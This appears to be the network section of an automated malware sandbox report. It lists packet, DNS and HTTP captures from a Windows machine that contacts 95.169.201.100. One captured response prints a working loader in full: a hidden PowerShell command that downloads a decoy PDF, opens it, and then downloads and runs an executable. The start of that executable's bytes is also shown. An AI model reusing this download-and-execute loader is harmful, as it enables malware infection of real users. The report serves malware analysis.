                                                                                                                                                      Dec 4, 2024 13:58:20.794143915 CET44349755172.64.41.3192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:20.794188976 CET49755443192.168.2.4172.64.41.3
                                                                                                                                                      Dec 4, 2024 13:58:20.806173086 CET49741443192.168.2.420.12.23.50
                                                                                                                                                      Dec 4, 2024 13:58:20.851327896 CET4434974120.12.23.50192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:20.935326099 CET44349756162.159.61.3192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:20.935403109 CET49756443192.168.2.4162.159.61.3
                                                                                                                                                      Dec 4, 2024 13:58:20.990494967 CET49756443192.168.2.4162.159.61.3
                                                                                                                                                      Dec 4, 2024 13:58:20.990592003 CET44349756162.159.61.3192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:20.990655899 CET49756443192.168.2.4162.159.61.3
                                                                                                                                                      Dec 4, 2024 13:58:21.000911951 CET44349746172.217.21.33192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:21.002785921 CET44349746172.217.21.33192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:21.002870083 CET49746443192.168.2.4172.217.21.33
                                                                                                                                                      Dec 4, 2024 13:58:21.002897978 CET44349746172.217.21.33192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:21.017208099 CET44349746172.217.21.33192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:21.017396927 CET49746443192.168.2.4172.217.21.33
                                                                                                                                                      Dec 4, 2024 13:58:21.017414093 CET44349746172.217.21.33192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:21.028717995 CET44349746172.217.21.33192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:21.028943062 CET49746443192.168.2.4172.217.21.33
                                                                                                                                                      Dec 4, 2024 13:58:21.028956890 CET44349746172.217.21.33192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:21.041577101 CET44349746172.217.21.33192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:21.041647911 CET49746443192.168.2.4172.217.21.33
                                                                                                                                                      Dec 4, 2024 13:58:21.041671991 CET44349746172.217.21.33192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:21.057534933 CET44349746172.217.21.33192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:21.057600975 CET49746443192.168.2.4172.217.21.33
                                                                                                                                                      Dec 4, 2024 13:58:21.057614088 CET44349746172.217.21.33192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:21.063796997 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:21.121814966 CET44349746172.217.21.33192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:21.121857882 CET44349746172.217.21.33192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:21.121869087 CET49746443192.168.2.4172.217.21.33
                                                                                                                                                      Dec 4, 2024 13:58:21.121881962 CET44349746172.217.21.33192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:21.121946096 CET49746443192.168.2.4172.217.21.33
                                                                                                                                                      Dec 4, 2024 13:58:21.126079082 CET44349746172.217.21.33192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:21.186266899 CET44349746172.217.21.33192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:21.186402082 CET49746443192.168.2.4172.217.21.33
                                                                                                                                                      Dec 4, 2024 13:58:21.186417103 CET44349746172.217.21.33192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:21.195406914 CET44349746172.217.21.33192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:21.195468903 CET49746443192.168.2.4172.217.21.33
                                                                                                                                                      Dec 4, 2024 13:58:21.195482016 CET44349746172.217.21.33192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:21.203684092 CET44349746172.217.21.33192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:21.203739882 CET49746443192.168.2.4172.217.21.33
                                                                                                                                                      Dec 4, 2024 13:58:21.203752041 CET44349746172.217.21.33192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:21.212125063 CET44349746172.217.21.33192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:21.212198973 CET49746443192.168.2.4172.217.21.33
                                                                                                                                                      Dec 4, 2024 13:58:21.212212086 CET44349746172.217.21.33192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:21.223546028 CET44349746172.217.21.33192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:21.223661900 CET49746443192.168.2.4172.217.21.33
                                                                                                                                                      Dec 4, 2024 13:58:21.223675966 CET44349746172.217.21.33192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:21.237242937 CET44349746172.217.21.33192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:21.238532066 CET49746443192.168.2.4172.217.21.33
                                                                                                                                                      Dec 4, 2024 13:58:21.238554955 CET44349746172.217.21.33192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:21.249325991 CET44349746172.217.21.33192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:21.249465942 CET49746443192.168.2.4172.217.21.33
                                                                                                                                                      Dec 4, 2024 13:58:21.249480963 CET44349746172.217.21.33192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:21.263035059 CET44349746172.217.21.33192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:21.263187885 CET49746443192.168.2.4172.217.21.33
                                                                                                                                                      Dec 4, 2024 13:58:21.263205051 CET44349746172.217.21.33192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:21.276639938 CET44349746172.217.21.33192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:21.276689053 CET49746443192.168.2.4172.217.21.33
                                                                                                                                                      Dec 4, 2024 13:58:21.276700020 CET44349746172.217.21.33192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:21.290412903 CET44349746172.217.21.33192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:21.290462017 CET49746443192.168.2.4172.217.21.33
                                                                                                                                                      Dec 4, 2024 13:58:21.290477037 CET44349746172.217.21.33192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:21.303495884 CET44349746172.217.21.33192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:21.303550959 CET49746443192.168.2.4172.217.21.33
                                                                                                                                                      Dec 4, 2024 13:58:21.303563118 CET44349746172.217.21.33192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:21.315757990 CET44349746172.217.21.33192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:21.315911055 CET49746443192.168.2.4172.217.21.33
                                                                                                                                                      Dec 4, 2024 13:58:21.315922976 CET44349746172.217.21.33192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:21.324259043 CET4434974120.12.23.50192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:21.324300051 CET4434974120.12.23.50192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:21.324307919 CET4434974120.12.23.50192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:21.324331999 CET4434974120.12.23.50192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:21.324342966 CET4434974120.12.23.50192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:21.324352026 CET49741443192.168.2.420.12.23.50
                                                                                                                                                      Dec 4, 2024 13:58:21.324366093 CET4434974120.12.23.50192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:21.324388027 CET4434974120.12.23.50192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:21.324402094 CET49741443192.168.2.420.12.23.50
                                                                                                                                                      Dec 4, 2024 13:58:21.324409962 CET49741443192.168.2.420.12.23.50
                                                                                                                                                      Dec 4, 2024 13:58:21.324424982 CET49741443192.168.2.420.12.23.50
                                                                                                                                                      Dec 4, 2024 13:58:21.328478098 CET44349746172.217.21.33192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:21.328686953 CET49746443192.168.2.4172.217.21.33
                                                                                                                                                      Dec 4, 2024 13:58:21.328700066 CET44349746172.217.21.33192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:21.341355085 CET44349746172.217.21.33192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:21.341427088 CET49746443192.168.2.4172.217.21.33
                                                                                                                                                      Dec 4, 2024 13:58:21.341444969 CET44349746172.217.21.33192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:21.345438004 CET4434974120.12.23.50192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:21.345494986 CET49741443192.168.2.420.12.23.50
                                                                                                                                                      Dec 4, 2024 13:58:21.345509052 CET4434974120.12.23.50192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:21.345521927 CET4434974120.12.23.50192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:21.345562935 CET49741443192.168.2.420.12.23.50
                                                                                                                                                      Dec 4, 2024 13:58:21.354430914 CET44349746172.217.21.33192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:21.354566097 CET49746443192.168.2.4172.217.21.33
                                                                                                                                                      Dec 4, 2024 13:58:21.354581118 CET44349746172.217.21.33192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:21.376679897 CET44349746172.217.21.33192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:21.376743078 CET49746443192.168.2.4172.217.21.33
                                                                                                                                                      Dec 4, 2024 13:58:21.376753092 CET44349746172.217.21.33192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:21.379772902 CET44349746172.217.21.33192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:21.379861116 CET49746443192.168.2.4172.217.21.33
                                                                                                                                                      Dec 4, 2024 13:58:21.379870892 CET44349746172.217.21.33192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:21.386080027 CET44349746172.217.21.33192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:21.386234999 CET49746443192.168.2.4172.217.21.33
                                                                                                                                                      Dec 4, 2024 13:58:21.386245966 CET44349746172.217.21.33192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:21.394030094 CET44349746172.217.21.33192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:21.394217968 CET49746443192.168.2.4172.217.21.33
                                                                                                                                                      Dec 4, 2024 13:58:21.394227982 CET44349746172.217.21.33192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:21.401890039 CET44349746172.217.21.33192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:21.401995897 CET49746443192.168.2.4172.217.21.33
                                                                                                                                                      Dec 4, 2024 13:58:21.402009010 CET44349746172.217.21.33192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:21.409323931 CET44349746172.217.21.33192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:21.409363985 CET49746443192.168.2.4172.217.21.33
                                                                                                                                                      Dec 4, 2024 13:58:21.409378052 CET44349746172.217.21.33192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:21.416706085 CET44349746172.217.21.33192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:21.416776896 CET49746443192.168.2.4172.217.21.33
                                                                                                                                                      Dec 4, 2024 13:58:21.416791916 CET44349746172.217.21.33192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:21.425122976 CET44349746172.217.21.33192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:21.425224066 CET49746443192.168.2.4172.217.21.33
                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                      Dec 4, 2024 13:58:17.786717892 CET192.168.2.41.1.1.10x68bStandard query (0)bzib.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                      Dec 4, 2024 13:58:17.787123919 CET192.168.2.41.1.1.10x9505Standard query (0)bzib.nelreports.net65IN (0x0001)false
                                                                                                                                                      Dec 4, 2024 13:58:18.239732027 CET192.168.2.41.1.1.10xfb75Standard query (0)clients2.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                      Dec 4, 2024 13:58:18.239851952 CET192.168.2.41.1.1.10x9236Standard query (0)clients2.googleusercontent.com65IN (0x0001)false
                                                                                                                                                      Dec 4, 2024 13:58:18.518220901 CET192.168.2.41.1.1.10xa050Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                      Dec 4, 2024 13:58:18.518368006 CET192.168.2.41.1.1.10x6545Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                      Dec 4, 2024 13:58:18.518984079 CET192.168.2.41.1.1.10x1758Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                      Dec 4, 2024 13:58:18.519159079 CET192.168.2.41.1.1.10x8912Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                      Dec 4, 2024 13:58:18.576416969 CET192.168.2.41.1.1.10x30bbStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                      Dec 4, 2024 13:58:18.576688051 CET192.168.2.41.1.1.10x7c5aStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                      Dec 4, 2024 13:58:14.800656080 CET1.1.1.1192.168.2.40x1b7No error (0)b-0005.b-dc-msedge.net13.107.9.158A (IP address)IN (0x0001)false
                                                                                                                                                      Dec 4, 2024 13:58:17.926580906 CET1.1.1.1192.168.2.40x9505No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                      Dec 4, 2024 13:58:18.014908075 CET1.1.1.1192.168.2.40x68bNo error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                      Dec 4, 2024 13:58:18.377068996 CET1.1.1.1192.168.2.40xfb75No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                      Dec 4, 2024 13:58:18.377068996 CET1.1.1.1192.168.2.40xfb75No error (0)googlehosted.l.googleusercontent.com172.217.21.33A (IP address)IN (0x0001)false
                                                                                                                                                      Dec 4, 2024 13:58:18.476454020 CET1.1.1.1192.168.2.40x9236No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                      Dec 4, 2024 13:58:18.819453001 CET1.1.1.1192.168.2.40x6545No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                      Dec 4, 2024 13:58:18.819463015 CET1.1.1.1192.168.2.40xa050No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                      Dec 4, 2024 13:58:18.819463015 CET1.1.1.1192.168.2.40xa050No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                      Dec 4, 2024 13:58:18.819473982 CET1.1.1.1192.168.2.40x1758No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                      Dec 4, 2024 13:58:18.819473982 CET1.1.1.1192.168.2.40x1758No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                      Dec 4, 2024 13:58:18.819483042 CET1.1.1.1192.168.2.40x8912No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                      Dec 4, 2024 13:58:18.819500923 CET1.1.1.1192.168.2.40x30bbNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                      Dec 4, 2024 13:58:18.819500923 CET1.1.1.1192.168.2.40x30bbNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                      Dec 4, 2024 13:58:18.819509983 CET1.1.1.1192.168.2.40x7c5aNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                      Dec 4, 2024 13:58:22.092248917 CET1.1.1.1192.168.2.40x9ce8No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                      Dec 4, 2024 13:58:22.092248917 CET1.1.1.1192.168.2.40x9ce8No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                      Dec 4, 2024 13:59:13.828288078 CET1.1.1.1192.168.2.40xb9eeNo error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                      Dec 4, 2024 13:59:13.828288078 CET1.1.1.1192.168.2.40xb9eeNo error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                      Dec 4, 2024 13:59:14.847405910 CET1.1.1.1192.168.2.40xb9eeNo error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                      Dec 4, 2024 13:59:14.847405910 CET1.1.1.1192.168.2.40xb9eeNo error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                      Dec 4, 2024 13:59:15.884285927 CET1.1.1.1192.168.2.40xb9eeNo error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                      Dec 4, 2024 13:59:15.884285927 CET1.1.1.1192.168.2.40xb9eeNo error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                      Dec 4, 2024 13:59:17.886059999 CET1.1.1.1192.168.2.40xb9eeNo error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                      Dec 4, 2024 13:59:17.886059999 CET1.1.1.1192.168.2.40xb9eeNo error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                      Dec 4, 2024 13:59:21.887643099 CET1.1.1.1192.168.2.40xb9eeNo error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                      Dec 4, 2024 13:59:21.887643099 CET1.1.1.1192.168.2.40xb9eeNo error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      0192.168.2.44973095.169.201.100189565296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      Dec 4, 2024 13:58:00.742913961 CET208OUTGET /api/secure/116887b2ac34a05784dca6f2cac7cc03 HTTP/1.1
                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                      Host: 95.169.201.100:18956
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Dec 4, 2024 13:58:02.798145056 CET370INHTTP/1.1 200 OK
                                                                                                                                                      Server: Werkzeug/3.0.3 Python/3.12.7
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:58:02 GMT
                                                                                                                                                      Content-Disposition: inline; filename=readme.txt
                                                                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                                                                      Content-Length: 128
                                                                                                                                                      Last-Modified: Wed, 04 Dec 2024 07:51:18 GMT
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      ETag: "1733298678.0-128-2603027055"
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:58:02 GMT
                                                                                                                                                      Connection: close


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      1192.168.2.44973195.169.201.100189605296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      Dec 4, 2024 13:58:03.151905060 CET190OUTGET /uploads/team-1/loader.txt HTTP/1.1
                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                      Host: 95.169.201.100:18960
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Dec 4, 2024 13:58:04.423015118 CET585INHTTP/1.1 200 OK
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      Content-Length: 399
                                                                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                                                                      Last-Modified: Wed, 04 Dec 2024 07:47:43 GMT
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:58:04 GMT
                                                                                                                                                      Data Raw: 40 65 63 68 6f 20 6f 66 66 0d 0a 70 6f 77 65 72 73 68 65 6c 6c 20 2d 57 69 6e 64 6f 77 53 74 79 6c 65 20 48 69 64 64 65 6e 20 2d 43 6f 6d 6d 61 6e 64 20 5e 0d 0a 20 20 20 20 22 49 57 52 20 2d 55 72 69 20 22 68 74 74 70 3a 2f 2f 39 35 2e 31 36 39 2e 32 30 31 2e 31 30 30 3a 31 38 39 36 30 2f 75 70 6c 6f 61 64 73 2f 74 65 61 6d 2d 31 2f 72 65 61 64 6d 65 2e 70 64 66 22 20 2d 4f 75 74 46 69 6c 65 20 22 24 65 6e 76 3a 74 65 6d 70 5c 72 65 61 64 6d 65 2e 70 64 66 22 20 3b 20 20 53 74 61 72 74 2d 50 72 6f 63 65 73 73 20 27 6d 73 65 64 67 65 2e 65 78 65 27 20 2d 41 72 67 75 6d 65 6e 74 4c 69 73 74 20 5c 22 2d 2d 6b 69 6f 73 6b 20 24 65 6e 76 3a 74 65 6d 70 5c 72 65 61 64 6d 65 2e 70 64 66 5c 22 20 3b 20 49 57 52 20 2d 55 72 69 20 22 68 74 74 70 3a 2f 2f 39 35 2e 31 36 39 2e 32 30 31 2e 31 30 30 3a 31 38 39 36 30 2f 75 70 6c 6f 61 64 73 2f 74 65 61 6d 2d 31 2f 72 65 61 64 6d 65 2e 65 78 65 22 20 2d 4f 75 74 46 69 6c 65 20 22 24 65 6e 76 3a 74 65 6d 70 5c 31 32 33 31 32 33 32 31 33 31 32 33 31 32 33 33 32 31 [TRUNCATED]
                                                                                                                                                      Data Ascii: @echo offpowershell -WindowStyle Hidden -Command ^ "IWR -Uri "http://95.169.201.100:18960/uploads/team-1/readme.pdf" -OutFile "$env:temp\readme.pdf" ; Start-Process 'msedge.exe' -ArgumentList \"--kiosk $env:temp\readme.pdf\" ; IWR -Uri "http://95.169.201.100:18960/uploads/team-1/readme.exe" -OutFile "$env:temp\123123213123123321132.exe" ; start "$env:temp\123123213123123321132.exe""exit


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      2192.168.2.44973295.169.201.100189607288C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      Dec 4, 2024 13:58:06.260673046 CET190OUTGET /uploads/team-1/readme.pdf HTTP/1.1
                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                      Host: 95.169.201.100:18960
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Dec 4, 2024 13:58:07.517987967 CET1236INHTTP/1.1 200 OK
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      Content-Length: 656088
                                                                                                                                                      Content-Type: application/pdf
                                                                                                                                                      Last-Modified: Mon, 02 Dec 2024 20:24:49 GMT
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:58:07 GMT
                                                                                                                                                      Data Raw: 25 50 44 46 2d 31 2e 37 0a 25 e2 e3 cf d3 0a 31 38 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 4c 65 6e 67 74 68 20 32 39 33 0a 2f 4e 20 33 0a 2f 46 69 6c 74 65 72 20 2f 46 6c 61 74 65 44 65 63 6f 64 65 0a 3e 3e 0a 73 74 72 65 61 6d 0a 78 9c 7d 90 bd 4a c3 00 14 85 bf d4 82 28 8a 83 0e 1d 1c 32 38 b8 68 93 a6 69 52 70 69 22 16 d7 56 a1 a9 53 92 a6 41 ec 4f 48 53 f4 01 74 73 70 75 2b 2e be 80 e8 63 28 08 0e e2 e0 23 88 a0 b3 a4 41 52 90 78 e0 c2 c7 e1 c0 bd f7 40 ae 00 90 97 a0 3f 88 c2 46 dd 10 5b 56 5b 9c 7f 47 40 60 2a db 1d 05 64 4b 80 ef 97 24 fb bc f5 4f 2e 4b 0b 1d 6f e4 02 1f 40 14 b6 ac 36 08 1d 60 cd 4f f8 2c 66 27 e1 cb 98 4f a3 20 02 61 12 73 78 d0 30 41 b8 03 36 fd 19 76 66 d8 0d c2 38 ff 06 ec f4 7b 63 37 bd 9b 25 6f 70 d8 04 5a c0 3a 75 86 0c f1 e9 e1 51 a4 c9 09 c7 d8 14 d1 30 51 d9 a3 46 09 19 15 19 85 2a 1a e5 e9 d4 90 28 a3 53 c1 c0 c0 c4 44 47 41 43 41 61 17 95 6a dc 67 b2 72 78 03 fa 17 cc 5d a5 9e 73 0d 0f 17 50 78 4d bd 8d 09 ac 9c c3 fd 63 ea a5 1d 07 76 68 4f ad 3c 90 eb 76 e1 f3 16 96 [TRUNCATED]
                                                                                                                                                      Data Ascii: %PDF-1.7%18 0 obj<</Length 293/N 3/Filter /FlateDecode>>streamx}J(28hiRpi"VSAOHStspu+.c(#ARx@?F[V[G@`*dK$O.Ko@6`O,f'O asx0A6vf8{c7%opZ:uQ0QF*(SDGACAajgrx]sPxMcvhO<v-X}b3~*mDJHT~Kendstreamendobj19 0 obj<</Type /XObject/Subtype /Image/Width 2400/Height 1363/ColorSpace /DeviceRGB/BitsPerComponent 8/ColorTransform 0/Filter [/FlateDecode /DCTDecode]/DecodeParms [null <</Quality 45>>]/Length 11488>>streamx}}py} :4nA'`.IeT])E!&u9&k0-]AmVLfFP!4MQMgw=Hxox&qjF3}O}?}~lq-,}g?K>\_IfxGw\:~9|"h2h75Hf_BKG:A>D*NySgg.=+~+~Nwtl|OOCOBr||_xi [TRUNCATED]
                                                                                                                                                      Dec 4, 2024 13:58:10.774210930 CET166OUTGET /uploads/team-1/readme.exe HTTP/1.1
                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                      Host: 95.169.201.100:18960
                                                                                                                                                      Dec 4, 2024 13:58:11.179347038 CET701INHTTP/1.1 200 OK
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      Content-Length: 2764800
                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                      Last-Modified: Tue, 03 Dec 2024 09:35:15 GMT
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:58:10 GMT
                                                                                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd 8c c0 ee f9 ed ae bd f9 ed ae bd f9 ed ae bd 7a e5 f1 bd fe ed ae bd 03 ce b7 bd fb ed ae bd ea e5 f3 bd fb ed ae bd 7a e5 f3 bd ee ed ae bd f9 ed af bd 9b ec ae bd 23 ce b2 bd f8 ed ae bd fc e1 f1 bd f8 ed ae bd fc e1 ce bd 90 ec ae bd 15 e6 f0 bd f8 ed ae bd f9 ed ae bd f8 ed ae bd fc e1 f4 bd f8 ed ae bd 52 69 63 68 f9 ed ae bd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 ee d1 10 43 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 07 0a 00 c0 13 00 00 60 16 00 00 00 00 00 00 c3 0d 00 00 10 00 00 00 d0 13 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 [TRUNCATED]
                                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$zz#RichPELC`@6Y$.".text


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      0192.168.2.44973413.107.9.1584438080C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:58:17 UTC427OUTGET /work/api/v2/tenant/my/settingswithflights?&clienttype=edge-omnibox HTTP/1.1
                                                                                                                                                      Host: business.bing.com
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                      2024-12-04 12:58:17 UTC938INHTTP/1.1 401 Unauthorized
                                                                                                                                                      Cache-Control: max-age=0, no-cache, no-store, must-revalidate
                                                                                                                                                      Content-Length: 584
